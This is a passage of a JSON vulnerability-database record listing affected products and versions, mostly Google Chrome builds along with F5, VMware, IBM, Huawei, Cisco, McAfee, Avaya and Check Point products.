"trust": 0.3, "vendor": "google", "version": "25.0.1364.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.27" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "vcloud connector", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "secureplatform r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vsphere management assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.329.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.1" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1085.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.664.1" }, { "model": "gaia r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.26" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.596.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.103" }, { "model": "espace cc v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.69" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.730.0" }, { "model": "oceanstor s5500t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.0" }, { "model": "oceanstor s6800t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.40" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.610.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.422.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.48" }, { "model": "oceanstor cse v100r002c00lhwy01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.24" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "aura application server sip core pb28", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.116" }, { "model": "cloud single sign on", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.31" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.19" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.371.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.56" }, { "model": "secureplatform r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.107" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.1.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.615.0" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.51" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.102" }, { "model": "ios-xe for catalyst 4k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.12" }, { "model": "oceanstor hvs85t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.92" }, { "model": "system networking san24b-5 2498-f24", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75250" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.50" }, { "model": "associates layer mobile access gateway", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.28" }, { "model": "oceanstor s5600t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.873.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.301.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.794.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.40" }, { "model": "oceanstor s5600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.781.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1298.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.18" }, { "model": "secureplatform r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.72" }, { "model": "oceanstor v100r001c10", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "secureplatform r71.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "power hmc r7.9.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.554.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.13" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.08.0.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.631.0" }, { "model": "ios-xe for asr903", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.125" }, { "model": "move scheduler", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.54" }, { "model": "ediscovery identification and collection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.477.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.941.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "secureplatform r75", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.516.0" }, { "model": "qradar security information and event manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.430.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.457.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1008.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.943.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.21" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.609.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.211.0" }, { "model": "ios-xe for isr4400", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.42" }, { "model": "t5565 thin client hp t5565z smart client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "nvp", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.582.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.589.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.575.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.26" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "media experience engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "message networking sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1280.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.122" }, { "model": "3722-s52", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.39" }, { "model": "vcenter orchestrator appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.726.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1034.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.36" }, { "model": "algo risk service on cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "oceanstor s5800t v200r002c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "gaia embedded r71.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.32" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.716.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.480.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.700.0" }, { "model": "associates application performance management cloud monitor", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "oceanstor s5600t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh310 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.28" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.5" }, { "model": "oceanstor s6800t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh628 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.21" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "oceanstor s5800t v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1652.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.627.0" }, { "model": "network convergence system series routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60005.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.4" }, { "model": "gaia r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.28" }, { "model": "firewall enterprise control center", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.19" }, { "model": "e9000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "session border controller", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.826.0" }, { "model": "oceanstor hdp3500e v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.581.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.1" }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.544.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.130" }, { "model": "ipso r77", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1041" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.42" }, { "model": "mds", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.336.0" }, { "model": "storeever esl g3 tape library 665h gs12501", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "associates layer api gateway", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.124" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.922.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.21" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.910.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1686.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.90" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "firewall enterprise control center", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.671.0" }, { "model": "bsc6000 v900r008c15", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.66" }, { "model": "oceanstor s2600 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.68" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.424.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.39" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.898.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.478.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", 